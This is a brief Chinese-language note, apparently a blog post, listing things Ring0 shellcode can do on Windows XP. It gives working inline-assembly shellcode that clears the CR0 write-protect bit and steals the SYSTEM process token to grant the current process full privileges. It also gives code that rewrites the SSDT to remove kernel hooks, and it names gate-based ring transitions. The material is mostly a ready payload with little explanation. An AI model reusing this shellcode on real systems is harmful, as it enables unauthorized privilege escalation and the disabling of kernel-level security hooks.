1.提权到SYSTEM
修改当前进程的token为SYSTEM进程的
token,这样就具备了系统的最高权限,可以控制整个系统。
//Ring0中执行的Shellcode
NTSTATUS Ring0ShellCode(
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax;
and eax,0xFFFEFFFF;
mov cr0, eax;
}
//do something
_asm
{
mov eax,0xFFDFF124
mov eax,[eax] //获取当前线程PTHREAD
mov esi,[eax+0x220] //获取当前进程PEPROCESS
mov eax,esi
L:
mov eax,[eax+0x88] //获取进程链表
sub eax,0x88
mov edx,[eax+0x84] //获取PID
cmp edx,0x4 //比较进程ID是否为4即system 这几个偏移量与系统的版本有关,这里是XP
jne L
mov eax,[eax+0xc8]
mov [esi+0xc8],eax
}
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;
}
2.恢复内核Hook、Inline Hook
NTSTATUS Ring0ShellCode(
ULONG InformationClass,
ULONG BufferSize,
PVOID Buffer,
PULONG ReturnedLength)
{
__asm
{
cli;
mov eax, cr0;
mov g_uCr0,eax;
and eax,0xFFFEFFFF;
mov cr0, eax;
}
//do something
ULONG i;
for(i =0;i<g_ServiceNum;i++)
{
*(ULONG*)(*(ULONG*)g_RealSSDT+i*sizeof(ULONG)) = g_OrgService[i];
}
_asm
{
sti
mov eax,g_uCr0
mov cr0,eax
}
return 0;
}
3.添加调用门、中断门,任务门,陷进门
出入R0/R3的重要手段。